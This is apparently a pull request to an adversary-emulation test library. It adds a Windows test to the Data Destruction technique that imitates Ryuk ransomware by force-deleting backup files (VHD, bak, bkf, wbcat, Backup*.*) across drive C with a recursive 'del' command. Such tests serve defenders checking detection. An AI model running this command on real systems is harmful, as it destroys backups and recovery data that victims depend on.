### PR TITLE
T1485 Test to delete backup files similar to Ryuk

### DIFF
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -18,6 +18,8 @@ To maximize impact on the target organization in operations where network-wide a
 
 - [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
 
+- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+
 
 <br/>
 
@@ -110,6 +112,22 @@ To stop the test, break the command with CTRL/CMD+C.
 #### Run it with `bash`! 
 ```
 dd of=#{file_to_overwrite} if=#{overwrite_source}
+```
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Windows - Delete Backup Files
+Deletes backup files in a manner similar to Ryuk ransomware.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`! 
+```
+del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
 ```
 
 

--- a/atomics/T1485/T1485.yaml
+++ b/atomics/T1485/T1485.yaml
@@ -88,3 +88,15 @@ atomic_tests:
     name: bash
     command: |
       dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+- name: Windows - Delete Backup Files
+  description: |
+    Deletes backup files in a manner similar to Ryuk ransomware.
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: command_prompt
+    command: |
+      del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk

--- a/atomics/index.md
+++ b/atomics/index.md
@@ -468,6 +468,7 @@
   - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
   - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
   - Atomic Test #5: macOS/Linux - Overwrite file with DD [centos, linux, macos, ubuntu]
+  - Atomic Test #6: Windows - Delete Backup Files [windows]
 - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -13783,7 +13783,19 @@ impact:
           default: "/var/log/syslog"
       executor:
         name: bash
-        command: dd of=#{file_to_overwrite} if=#{overwrite_source}
+        command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+'
+    - name: Windows - Delete Backup Files
+      description: 'Deletes backup files in a manner similar to Ryuk ransomware.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        command: del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
+          c:\backup*.* c:\*.set c:\*.win c:\*.dsk
   '':
     technique:
       x_mitre_data_sources:

--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -324,6 +324,7 @@
   - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
   - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
   - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
+  - Atomic Test #6: Windows - Delete Backup Files [windows]
 - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)


### PR DESCRIPTION
**Details:**
Uses `del` to delete backup files in a manner similar to Ryuk.

**Testing:**
Tested in Win10

**Associated Issues:**
No associated issues